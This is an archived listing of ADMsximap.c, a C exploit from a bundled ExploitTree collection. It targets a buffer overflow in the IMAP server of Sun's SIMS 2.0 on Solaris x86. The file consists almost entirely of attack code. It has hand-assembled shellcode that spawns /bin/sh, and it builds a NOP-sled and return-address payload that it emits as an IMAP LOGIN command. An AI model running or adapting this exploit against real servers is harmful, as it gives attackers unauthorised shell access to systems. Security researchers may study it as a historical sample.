home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ADMsximap.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  4KB  |  83 lines
  1. /*      Copyright (c) 2000 ADM                                  */
  2. /*      All Rights Reserved                                     */
  3. /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
  4. /*      The copyright notice above does not evidence any        */
  5. /*      actual or intended publication of such source code.     */
  6. /*                                                              */
  7. /*      Title:        ADMsximap.c  (ADM Solaris X86 IMAP .c)    */
  8. /*      Tested under: SIMS 2.0, fixed now                       */
  9. /*      By:           K2                                        */
  10. /*      Discoverd by: DiGiT                                     */
  11. /*      Shellcode by: cheez                                     */
  12. /*      GROUP EFFORT*@$()!*$#(&@!*(!$                           */
  13. /*                                                              */
  14.  
  15.  
  16. #include <unistd.h>
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20.  
  21. char shell[] =
  22.   /*  0 */ "\xeb\x2d"                         /* jmp springboard      */
  23.   /* start:                                                           */
  24.   /*  2 */ "\x5e"                             /* popl %esi            */
  25.   /*  3 */ "\x31\xdb"                         /* xor %ebx,%ebx        */
  26.   /*  5 */ "\x88\x5e\x07"                     /* movb %bl,0x7(%esi)   */
  27.   /*  8 */ "\x89\x5e\x0c"                     /* movl %ebx,0xc(%esi)  */
  28.   /* 11 */ "\x89\x5e\x13"                     /* movl %ebx,0x13(%esi) */
  29.   /* 14 */ "\x88\x5e\x18"                     /* movb %bl,0x18(%esi)  */
  30.   /* 17 */ "\xb3\x80"                         /* movb $0x80,%bl       */
  31.   /* 19 */ "\x28\x5e\xed"                     /* subb %bl,-0x13(%esi) */
  32.   /* 22 */ "\x28\x5e\xf1"                     /* subb %bl,-0xf(%esi)  */
  33.   /* 25 */ "\x28\x5e\xf7"                     /* subb %bl,-0x9(%esi)  */
  34.   /* 28 */ "\x28\x5e\xf8"                     /* subb %bl,-0x8(%esi)  */
  35.   /* 31 */ "\x31\xc0"                         /* xor %eax,%eax        */
  36.   /* 33 */ "\xd0"                             /* pushl %eax           */
  37.   /* 34 */ "\x8d\x5e\x08"                     /* leal 0x8(%esi),%ebx  */
  38.   /* 37 */ "\xd3"                             /* pushl %ebx           */
  39.   /* 38 */ "\x8d\x1e"                         /* leal (%esi),%ebx     */
  40.   /* 40 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)  */
  41.   /* 43 */ "\xd3"                             /* pushl %ebx           */
  42.   /* 44 */ "\xd0"                             /* pushl %eax           */
  43.   /* 45 */ "\xeb\x15"                         /* jmp exec             */
  44.   /* springboard:                                                     */
  45.   /* 47 */ "\xe8\xce\xff\xff\xff"             /* call start           */
  46.   /* data:                                                            */
  47.   /* 52 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA                 */
  48.   /* 60 */ "\xff\xff\xff\xff"                 /* DATA                 */
  49.   /* 64 */ "\xff\xff\xff\xff"                 /* DATA                 */
  50.   /* execve:                                                          */
  51.   /* 68 */ "\xb0\x3b"                         /* movb $0x3b,%al       */
  52.   /* 70 */ "\x9a\xff\xff\xff\xff\x07\xff";    /* lcall 0x7,0x0        */
  53.  
  54.  
  55. #define SIZE   1600
  56. #define NOPDEF 631
  57. #define DEFOFF -111
  58.  
  59. const char x86_nop=0x90;
  60. long nop=NOPDEF,esp=0x80472a0;
  61. long offset=DEFOFF;
  62. char buffer[SIZE];
  63.  
  64. int main (int argc, char *argv[])
  65. {
  66.   int i;
  67.  
  68.   if (argc > 1) offset += strtol(argv[1], NULL, 0);
  69.   if (argc > 2) nop += strtoul(argv[2], NULL, 0);
  70.  
  71.   memset(buffer, x86_nop, SIZE);
  72.   memcpy(buffer+nop, shell, strlen(shell));
  73.   for (i = (nop+strlen(shell)); i < SIZE; i += 4)
  74.     {
  75.       *((int *) &buffer[i]) = esp+offset;
  76.     }
  77.  
  78.   fprintf(stderr,"offset = 0x%x\tstrlen %d\n",esp+offset,strlen(buffer));
  79.   printf("604 LOGIN \"%s\" pass\r\n", buffer);
  80.  
  81.   return 0;
  82. }
  83. /*                    www.hack.co.za                  [23 Feb 2000]*/